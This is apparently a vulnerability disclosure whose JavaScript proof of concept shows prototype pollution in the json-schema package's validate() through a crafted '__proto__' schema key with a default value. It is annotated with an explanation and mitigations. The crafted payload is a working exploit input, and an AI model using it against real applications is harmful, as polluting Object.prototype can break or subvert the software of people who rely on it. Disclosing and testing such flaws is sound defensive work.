A crafted payload passed to `validate()`
leads to prototype pollution.
// PoC.js
// Demonstrates prototype pollution through json-schema's validate().
// The instance carries a "$schema" whose "properties" map contains a
// "__proto__" key with its own nested "properties"/"default". Because the
// object comes from JSON.parse, "__proto__" is created as an ordinary own
// property (an object literal would instead set the prototype), so a
// validator that iterates property names can descend into it like any
// other key — which is exactly what must be rejected or skipped.
const { validate } = require("json-schema");
// NOTE(review): json-schema is a third-party package; the outcome below
// depends on the installed version. A release that guards against
// "__proto__" / "constructor" / "prototype" keys is expected to leave
// `a.polluted` undefined after the call — confirm against the version in use.
const instance = JSON.parse(`
{
"$schema":{
"type": "object",
"properties":{
"__proto__": {
"type": "object",
"properties":{
"polluted": {
"type": "string",
"default": "polluted"
}
}
}
},
"__proto__": {}
}
}`);
// A fresh, unrelated object with no own "polluted" property: any value
// observed on it can only come from Object.prototype.
const a = {};
console.log(a.polluted); // before validation: expected undefined
validate(instance);
// If the call wrote through "__proto__" (presumably while applying the
// schema "default" for "polluted"), Object.prototype now carries the key
// and this prints "polluted" for an object that was never touched.
// Mitigation for schema consumers: treat schemas from untrusted sources as
// input — drop or reject dangerous keys before validation, and keep
// dictionaries in Object.create(null) or Map so lookups cannot reach
// the prototype chain.
console.log(a.polluted);
This vulnerability makes prototype pollution possible.